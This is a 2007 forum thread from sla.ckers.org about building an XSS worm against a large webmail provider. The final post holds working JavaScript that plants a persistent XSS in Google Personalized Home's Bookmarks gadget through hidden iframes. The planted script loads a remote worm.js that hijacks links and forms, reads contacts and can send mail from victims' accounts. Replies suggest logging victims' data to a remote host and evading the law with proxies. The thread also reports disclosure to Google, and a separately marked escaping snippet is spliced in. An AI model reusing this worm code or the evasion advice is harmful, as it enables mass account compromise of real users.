Sla.ckers.org
Functionality of XSS Worm
Posted by: Hong
Date: March 21, 2007 05:40AM

I am going to write a benign, non-malicious XSS worm which targets a website.

Here is the background:
I already found a persistent XSS, but that XSS is located on a private page of the user; no other user can access that page.
I have another reflective XSS which is located on a public page.
I can get the email contact list of the infected user and send email to others from the infected user's email account.

What functionalities should the worm have? Any suggestions?

- Hong

Re: Functionality of XSS Worm
Posted by: WhiteAcid
Date: March 21, 2007 06:16AM

It could send the username to a remote logging place which timestamps every log. This way you can see the growth rate. If it can read the password it could also send out stats about the password (such as its length and whether it passes various regexes to test its strength).

You wouldn't need to build a logging thing, just use ccl.whiteacid.org, that will automatically also log the user agent, browser IP and referer and yes, it will timestamp each entry.

I don't know if logging the email would do much good.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Functionality of XSS Worm
Posted by: Kyran
Date: March 21, 2007 12:45PM

Perhaps log where the e-mail is hosted: the domain and the server's name.

- Kyran

Re: Functionality of XSS Worm
Posted by: Hong
Date: March 22, 2007 11:17AM

I will try to use ccl.whiteacid.org to build the logging system.

But I still have some questions.
Should it collect any private data?
Should it notify users that they are infected by the worm?
Should it spread itself without user permission?

I know all the questions don't make sense, but the target site is one of the biggest sites in the world; it provides email and many other services, and it has a huge number of users. Though it needs social engineering to spread, I think it can infect a lot of users, and I really don't want to scare anyone. I want to make the worm as benign as possible.

- Hong

Re: Functionality of XSS Worm
Posted by: WhiteAcid
Date: March 22, 2007 11:25AM

Personally I think it should be as realistic as possible, except that it shouldn't actually cause any damage (besides the small cost of bandwidth etc.). So it should not collect private data such as their real name, address, email address etc. Collecting something such as their email host could be useful though (e.g. just the part after the @). Collecting stuff like their user agent and their username should be fine too. As for noticing that the user has already been infected, I don't think the user should discriminate in that way. If you log the username then you'd be able to later count the number of users that were "infected" more than once.

As for spreading without interaction. As I said earlier it should try to be as realistic as possible, a real worm would not require user interaction unless it had to.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Functionality of XSS Worm
Posted by: psifertex
Date: March 22, 2007 08:56PM

Be very careful Hong! Remember what happened to Samy even though his worm had no malicious intent in the design. As RSnake's said before, if folks come asking for logs with subpoenas, there's not much he can do (uhh, at least, I think he said that before, but this hasn't been my week, so maybe I'm mis-remembering). Even if you have the best intentions in the world, I'd be extremely wary of considering something like this.

Of course, if it requires user interaction then the growth rate should certainly be limited and whoever the site is shouldn't be DoS'ed as a result, but you never know.

Just being purely selfish, we don't want to lose your contributions here because you get busted and can't access the internet outside of work! ;-)

Re: Functionality of XSS Worm
Posted by: rsnake
Date: March 22, 2007 11:17PM

No, that's absolutely correct. Be legal, or beware. :) It's not that I want to give up logs, but I'm also realistic about the law. So use proxies, fake everything and don't tell me about it if you want to be safe (not telling anyone about a crime is a good rule of thumb anyway).

- RSnake
Gotta love it. http://ha.ckers.org

Re: Functionality of XSS Worm
Posted by: Hong
Date: March 23, 2007 12:26PM

Thanks.
Yes, I want to stay out of jail, and I don't want to do any crime.

Now my worm has some simple functions (i.e. hijack links, hijack forms, read the contact list, etc.).
I think I won't publish the worm, and will inform the company of their holes.

Maybe I capture some screenshots and post it later. :)

- Hong

Re: Functionality of XSS Worm
Posted by: hackathology
Date: March 31, 2007 11:44PM

cool hong. Try to anonymize as much as possible, but be careful ya.

http://hackathology.blogspot.com

Re: Functionality of XSS Worm
Posted by: Hong
Date: April 06, 2007 09:43AM

Here are the details of the persistent XSS vuln:
In Google Personalized Home, the Bookmarks gadget has a persistent XSS vuln: the name of the URI is not sanitized for < and >, and it is placed inside a script tag, so we can insert an XSS payload using --></script><script>XSS</script>.
All bookmarks are saved on the Google server.

Google Personalized Home is a private page, which means you need another Google XSS to insert the persistent XSS; a reflective XSS is enough. To add the XSS payload to Google Personalized Home, you can use the following code snippet.

// Runs in the hidden iframe f2 (Google Personalized Home): find the
// "add bookmark" form and submit it with the payload as the bookmark title.
function infect()
{
    var fx = f2.document.getElementsByTagName("form");
    for (var i = 0; i < fx.length; i++)
    {
        var act = fx[i].action;
        if (act.indexOf("/bookmarks/mark") != -1)
        {
            fx[i].bkmk.value = "http://www.attacker.org";
            fx[i].title.value = "--></script><script src=http://www.attacker.org/worm.js></script>";
            fx[i].labels.value = "homepage";
            fx[i].onsubmit();
            fx[i].submit();
            location.href = 'http://www.google.com/ig';
            break;
        }
    }
}

// Load Google Personalized Home in a hidden iframe and call infect() when it is ready.
function install()
{
    document.body.innerHTML += "<iframe name='f2' style='width:0px;height:0px;border:0px' src='http://www.google.com/ig' onLoad='infect()'></iframe>";
}

// Runs once the gadget directory (iframe f1) has loaded: add the Bookmarks gadget
// to the user's page, then install the second iframe.
function addBookmarksGadget()
{
    var f = f1.document.advd;
    f.url.value = "http://www.google.com/ig/modules/bookmarks.xml";
    f.onsubmit();
    f.url.value = "http://www.google.com/ig/modules/builtin_bookmarks.xml";
    f.onsubmit();
    setTimeout('install()', 1000);
}

// Entry point: open the gadget directory in a hidden iframe.
document.body.innerHTML += "<iframe name='f1' style='width:0px;height:0px;border:0px' src='/ig/directory?root=/ig&dpos=top' onLoad='addBookmarksGadget()'></iframe>";


Because the Bookmarks gadget has a size limit when adding a bookmark, it uses Google Bookmarks to add the bookmark. After the bookmark is added, every time the infected user signs in and goes to his Google Personalized Home, worm.js will be downloaded and executed.

I wrote a simple benign worm; I call it GWorm. Here are some screenshots:
The source code of the XSS inside the Bookmarks gadget
http://yathong.googlepages.com/GWorm1.jpg
Different theme on Google Personalized Home
http://yathong.googlepages.com/GWorm17.jpg
http://yathong.googlepages.com/GWorm11.jpg
http://yathong.googlepages.com/GWorm14.jpg
http://yathong.googlepages.com/GWorm16.jpg
Hijack all hyperlinks
http://yathong.googlepages.com/GWorm10.jpg
http://yathong.googlepages.com/GWorm6.jpg
Hijack all forms
http://yathong.googlepages.com/GWorm3.jpg

GWorm also reads contact list, and it can send email to anyone from infected user gmail.

I already sent an email to Google a week ago (29/3), and they replied with two emails on the same day.

Edited: One of the replies from Google was not an auto-reply, and a fix is currently being worked on.

- Hong



Edited 1 time(s). Last edit at 04/06/2007 01:48PM by Hong.
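As an added, defender-side example that is not part of the thread: the bug Hong describes is an untrusted bookmark title interpolated into an inline script element without neutralising < and >. The snippet below (function names jsStringLiteral, renderBookmarkScript and scriptContextIntact are my own, and the sample title is a constructed copy of the breakout string above with a placeholder host) shows the context-aware escaping that closes that gap, next to the unsafe interpolation, and a check that the breakout no longer splits the script element.

```javascript
'use strict';

// Encode a value as a JavaScript string literal that is safe to embed inside
// an inline <script> body. JSON.stringify handles quotes and backslashes; the
// extra replacements hex-escape the characters the HTML tokenizer cares about,
// because it ends a <script> element on "</script" and recognises "<!--" and
// "-->" regardless of JavaScript string quoting.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Render the inline script a page might emit for a saved bookmark.
// safe=false mirrors the bug in the post: the title is interpolated verbatim.
// safe=true (the default) routes both values through jsStringLiteral.
function renderBookmarkScript(title, url, { safe = true } = {}) {
  const t = safe ? jsStringLiteral(title) : '"' + title + '"';
  const u = safe ? jsStringLiteral(url) : '"' + url + '"';
  return '<script>var bookmark = {title: ' + t + ', url: ' + u + '};</script>';
}

// Check that the rendered markup still holds exactly one script element and
// no HTML-comment markers, i.e. the untrusted value stayed inside the string.
function scriptContextIntact(html) {
  const opens = html.match(/<script[\s>]/gi) || [];
  const closes = html.match(/<\/script/gi) || [];
  return opens.length === 1 && closes.length === 1 && !/<!--|-->/.test(html);
}

// Constructed sample: the breakout string from the post, host replaced.
const PAYLOAD_TITLE = '--></script><script src=http://example.invalid/worm.js></script>';
const SAMPLE_URL = 'http://example.invalid';

module.exports = { jsStringLiteral, renderBookmarkScript, scriptContextIntact, PAYLOAD_TITLE, SAMPLE_URL };
```

The escaped form still decodes to the original title when the browser evaluates the literal, so the data is preserved; only its ability to terminate the script element is removed.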

Re: Functionality of XSS Worm
Posted by: Jib
Date: April 06, 2007 10:05AM

wow.

very interesting work, hong.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jacques Cousteau]

Re: Functionality of XSS Worm
Posted by: christ1an
Date: April 06, 2007 02:14PM

It seems to be fixed.

Re: Functionality of XSS Worm
Posted by: hackathology
Date: April 07, 2007 12:27PM

too profound for me to understand. But nice work Hong

http://hackathology.blogspot.com
